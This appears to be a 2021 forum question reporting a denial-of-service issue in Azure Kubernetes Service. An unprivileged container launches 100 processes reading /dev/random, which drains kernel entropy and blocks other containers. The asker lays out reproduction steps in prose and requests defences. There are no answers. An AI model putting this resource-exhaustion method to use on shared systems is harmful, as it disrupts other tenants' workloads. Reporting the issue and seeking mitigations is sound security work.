K
Q

A docker security issue about /dev/random to make DoS attack in the Azure AKS environment

5/3/2021

We find a docker security issue to exhaust all entropy of /dev/random in Linux Kernel and causing DoS attack in the Azure AKS environment.

Reproduction steps: 1. Follow the AKS tutorial to set up AKS clusters. We use one Virtual Machine with 8G memory, 120G SSD Disk, linux 5.4.0-1043-azure OS, Kubernetes Version V1.18.14 and Docker Version 19.3.14, to set the Azure Kubernetes Cluster. All those settings are done through by Azure Kubernetes UI. 2. Deploy the docker unprivileged malicious container with UID 1000, dropping all capabilities, using limited memory 2G, running on special core and disable privilege escalation. We run malicious container in a separate Kubernetes Namespace. 3. In the malicious contianer, we start 100 processes and read random data from /dev/random. As a result, the entropy of /dev/random is exhausted, read request from victim container always blocked, it can not get any random data from /dev/random.

Is there any way to defend against this attack inside Azure AKS environment? Looking forward to your reply!
-- Nanzi Yang
azure
docker
kubernetes

Similar Questions

How to attach EFS volume to Kubernetes PODs
Create ingress controller in namespace Kubernetes
Why does Google Cloud show an error when using ClusterIP
Kubernetes (connection)-drain node with local persistent storage
Kubernetes HyperV Cluster Expose Service

0 Answers